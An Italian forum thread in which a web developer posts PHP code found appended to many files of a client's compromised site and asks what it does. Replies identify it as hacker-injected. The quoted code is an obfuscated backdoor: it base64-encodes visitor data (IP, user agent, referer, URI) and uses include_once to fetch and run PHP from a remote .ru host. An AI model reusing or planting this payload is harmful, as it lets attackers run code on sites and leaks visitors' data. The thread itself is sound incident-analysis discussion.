Visualizzazione dei risultati da 1 a 5 su 5

Discussione: problema di sicurezza?

  1. #1

    problema di sicurezza?

    Salve,
    oggi un mio cliente mi ha chiesto di effettuare una modifica ad un suo vecchio sito fatto da un'altra persona, e in molti file alla fine c'è questo codice:
    Codice PHP:
    error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."befedzzazbzbazczb".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."befedzzazbzbazczb".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);} 
    decoficando il codice mi esce questo link:
    http://befedzzazbzbazczb.users.phpin....MTI3LjAuMC4x.
    cliccando sul link mi esce una pagina vuota, allora ho cercato su google users.phpinclude.ru e mi vengono fuori alcuni siti che sembrano essere anch'essi stati attaccati ad es.:
    - http://beadczzazbzgee.users.phpinclu...LjE0Mw==.:1%29
    - http://bdbaczzazbzhba.users.phpinclu...LjcxLjcx.:1%29
    queste pagine riportano dei link a caso...

    secondo voi di cosa si tratta?
    grazie a tutti per l'aiuto

  2. #2
    Da quel che ho capito accoda all'url l'host, la pagina richiesta, l'user agent, l'indirizzo ip e il referer (tutti in base64 e collegati da un punto). Non capisco a che pro però

  3. #3
    infatti è proprio questo che voglio capire...

  4. #4
    A me sembra il classico codice che si trova nei siti BUCATI da qualche hacker.
    Redirecta alcune informazioni verso un server esterno.
    Non ne vedo l'utilità (di solito il ink punta sempre ad una pagina dove ci si scarica del malware) però io commenterei delle istruzioni del genere.
    Quantomeno chiedi al tuo cliente se c'è un senso a tutto quel meccanismo.

    <ALCIO />
    Per cortesia: no PVT Tecnici
    ******* LINKS *******
    SRL
    MetalWave

  5. #5
    no, lui non ne sa niente...
    comunque ho già commentato tutto, volevo sapere però se questo aveva provocato dei danni al sito...

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.